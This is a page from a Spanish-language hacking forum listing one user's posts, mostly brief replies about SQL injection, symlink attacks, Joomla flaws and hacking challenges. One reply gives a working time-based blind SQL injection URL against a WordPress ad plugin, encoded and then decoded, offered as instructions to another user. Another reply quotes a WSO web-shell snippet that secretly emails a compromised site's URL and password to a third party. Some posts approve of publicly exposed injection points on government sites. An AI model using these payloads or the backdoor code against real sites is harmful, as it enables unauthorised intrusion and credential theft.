Menú

Mostrar Mensajes

Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.

Mostrar Mensajes Menú

Mensajes - TUNOVATO

Páginas1 2
#1
Bugs y Exploits / Re:Remote File Downloading (RFD) En MySQL
Noviembre 05, 2013, 11:56:52 PM
saludos compa;

:o me has dejao  :o

sigue asi compa vas bien
#2
Underc0de / Re:Reto Oficial #2 - El rey de la Colina - Anotate!
Septiembre 21, 2013, 11:07:42 PM
saludos,

aer me apunto si se puede aun  8)
#3
Bugs y Exploits / Re:[JoomlaScan v1.4] Scanner de vulnerabilidades para Joomla
Septiembre 11, 2013, 04:51:24 AM

Switch.pm  :o :o :o

vaya problemon para windows...

No tienes permitido ver enlaces. Registrate o Entra a tu cuenta

#4
Cursos, manuales y libros / Re:Pedido de Libros - Manuales [Pedilo aca!]
Septiembre 04, 2013, 03:57:22 AM
estoy en la busqueda de este libro:

Desarrollo Web con PHP 6, Apache y MySQL
Timothy Boronczyk, Elizabeth Naramore, Jason Gerner, Yann Le Scouarnec, Jeremy Stolz y Michael K. Glass


No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
No tienes permitido ver enlaces. Registrate o Entra a tu cuenta

#5
Dudas y pedidos generales / Re:Wordpress vulnerable sql
Agosto 27, 2013, 03:18:23 AM
saludos compa;

haz lo siguiente:

Código: text
http://www.site.com/wp-content/plugins/adrotate/adrotate-out.php?track=MScgQU5EIDE9SUYoMj4xLEJFTkNITUFSSyg1MDAwMDAwLE1ENShDSEFSKDExNSwxMTMsMTA4LDEwOSw5NywxMTIpKSksMCkj



http://www.AQUITUWEB.com/wp-content/plugins/adrotate/adrotate-out.php?track= <-- AQUI ESTO:
Código: text
MScgQU5EIDE9SUYoMj4xLEJFTkNITUFSSyg1MDAwMDAwLE1ENShDSEFSKDExNSwxMTMsMTA4LDEwOSw5NywxMTIpKSksMCkj


ESTO:
Código: text
MScgQU5EIDE9SUYoMj4xLEJFTkNITUFSSyg1MDAwMDAwLE1ENShDSEFSKDExNSwxMTMsMTA4LDEwOSw5NywxMTIpKSksMCkj


ES ESTO:
Código: text
1' AND 1=IF(2>1,BENCHMARK(5000000,MD5(CHAR(115,113,108,109,97,112))),0)#


lo cual esta encodeado en based64


si no entendistes como funciona.....  vas a tener que leeerrr y mucho..... o mejor te dedicas a otras cosas...  :o


saludos;
#6
Front-end / Re:El gran libro de HTML5, CSS3 y Javascript [MF]
Agosto 21, 2013, 01:32:58 AM
Leyendo aer como esta...  8)
#7
Bugs y Exploits / Re:Symlink en parte automatizado
Agosto 09, 2013, 11:21:01 PM
saludos,

para complementar tu post te agrego una version con Bypass name.conf


No tienes permitido ver enlaces. Registrate o Entra a tu cuenta


Nota: hay otras tool para auto symlink
#8
Shells / Re:[PHP] WSO shell backdoor
Julio 26, 2013, 11:37:31 PM
No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
Hay que enseñarles a ofuscar código a estos juakerz

Código: text

$visitc = $_COOKIE["visits"];
if ($visitc == "") {
  $visitc  = 0;
  $visitor = $_SERVER["REMOTE_ADDR"];
  $web     = $_SERVER["HTTP_HOST"];
  $inj     = $_SERVER["REQUEST_URI"];
  $target  = rawurldecode($web.$inj);
  $judul   = "WSO 2.7 http://$target by $visitor";
  $body    = "Bug: $target by $visitor - $auth_pass";
  if (!empty($web)) { @mail("[email protected]",$judul,$body,$auth_pass); }
}
else { $visitc++; }
@setcookie("visitz",$visitc);


este es un descarado...... ----> No tienes permitido ver enlaces. Registrate o Entra a tu cuenta@gmail.com

;D ;D ;D ;D ;D
#9
Bugs y Exploits / Re:Full Source Disclosure por SQLI
Julio 26, 2013, 10:29:42 PM
el clasico LOAD_FILE()   :o :o :o :o


aer cuando no puedes ver o provocar el error y ver el path o Document Root...!!!!


tambien tenes que aprovechar de explicar INTO OUTFILE para culminar el tuto...

pero ta bueno
#10
Wargames y retos / Re:[PROXIMAMENTE] Reto de esteganografia con premio en $$ [REGISTRESE AQUI]
Julio 24, 2013, 09:04:55 PM
Ok soy novato en este asunto pero puedo participar, me apunto....
#11
Hacking ShowOff / Re:SQLI http://webhosting.redsalud.gov.cl/
Junio 28, 2013, 11:23:58 PM
No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
Lo hago publico con la finalidad de darle una mano a la gente que quiere aprender y ver vectores reales y puedan probar o hacerse a la idea de distintas formas de hacer sqli, y el plus se lo doy ya que son webs del gobierno y llegado el momento que haga el tiempito, voy a empesar a reportar todo mientras tanto y mientras no se reparen los fallos pueden ir testeando, he publicado otras sqli con waf bypass, para justamente ayudar a otras personas a experimentar y ver otros vectores. Varios amigos han podido aplicar otros metodos como double error y otros metodos de filtrado de waf del los cuales tambien he aprendido cosas muy utiles al estudiar sus vectores, y asi tanto yo como la gente que quiera investigar un poco mas podemos hacer un reflujo de conocimiento, y pasarnos vectores personalizados y nuevos para ir aprendiendo.

Ademas le doy un poco mas de vida a la sección!

Saludos compa;

estoy totalmente de acuerdo con lo que dices; el compartir conocimientos e intercambiar ideas...!!!, haciendo asi que otro se interesen en el tema como los que se estaban realizando en los wargames donde se colocaban Retos con el fin meramente educativo... de escenarios reales...
para dejar volar la imaginacion y los conocimientos en cuanto a los diversos retos.., lo que si no comparto es la publicacion del vector... asi se pierde la magia, el encanto, no dejas que la curiosidad de como obtener el vector, y solo facilitas lameradas como me dijeron alguna vez con respecto a una web gubernamental...
#12
Dudas y pedidos generales / Re:Duda con tipo de hash
Junio 23, 2013, 04:12:28 PM

d688e36a56abaacd19c9f0fd2ac32be88def71f2956ed0a2770b2f3830237588a4dad03af5f140c55fcbbba86e6fe727fda37103523385a6b9936cf7f974df8d

a mi tambien me da:
SHA512

;)
#13
Bugs y Exploits / Re:Destripando la logica de una inyeccion [Mysql Doble Query Error Based]
Junio 15, 2013, 01:07:18 AM
 :o muy bueno....!!!  :o
#14
Wargames y retos / Re:[Medium/Hard]MySQL Injection Challenge.
Junio 14, 2013, 04:35:52 AM

Esta dura la cosa, ahy que leer y buscar comodines...

Nota: gradecimientos al compa por su orientacion...
#15
Seguridad Wireless / Re:Asegurando nuestra red wireless
Junio 04, 2013, 11:56:17 PM
es muy bueno compa;
#16
Base de Datos / Re: Tutorial básico de bases de datos
Junio 04, 2013, 11:20:39 PM
Cita de: [Corruptedyte link=topic=17301.msg59408#msg59408 date=1370390281]
En mis tiempos (cuando entraba a este foro) la gente tenia mas nivel y no publicaban cosas tan tan basicas, otra cosa en mis tiempos tambien a Mysql, PostgreSQL, etc... no se le llamaban bases de datos, se les llamaban SGBD...


jajajajaja ya empezo la elite a criticar....!!! los aportes de los demas...

o sera que nunca lo habian hecho tambien y se recuerdan de aquellos tiempos de n00bs cuan do publicaban republicaciones retraducidas del ingles al español para darselas de elite....


saludos;

nota: sin animo de ofender, el qque le pique que se rasque...!!!
#17
Seguridad web y en servidores / Re:[ACLARACION] Tipos de servidores
Mayo 28, 2013, 01:14:02 AM
 :o :o me voy enterando  :o :o
#18
Zona Webmaster / Re:Tabla periodica del HTML
Mayo 06, 2013, 11:05:34 PM
 :o Interesante...!!!  :o
#19
Bugs y Exploits / Re:Joomla! 3.0.3 Object Injection Vulnerability
Mayo 05, 2013, 01:49:19 AM
No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
Alguna pequeña explicacion de su uso?, funciona con todas las paginas que usan joomla o deben tener un plugin especifico para que la vulnerabilidad funcione?

si por favor....   :o :o :o
#20
Dudas y pedidos generales / Re:problema con symlink
Marzo 08, 2013, 01:03:20 AM
No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
Hola man, mira para symlinik hay varias herramientas que te podrian simplificar el trabajo y que no sea tan aburrido xD
Aca te dejo 1 shell para hacer symlink:
No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
Es tan simple como darle a Domain&Script y despues usar el wordpress password changer y el joomla password changer :D
Espero haberte ayudado...
SombrA
   


woowww

eres un capo wey....
Páginas1 2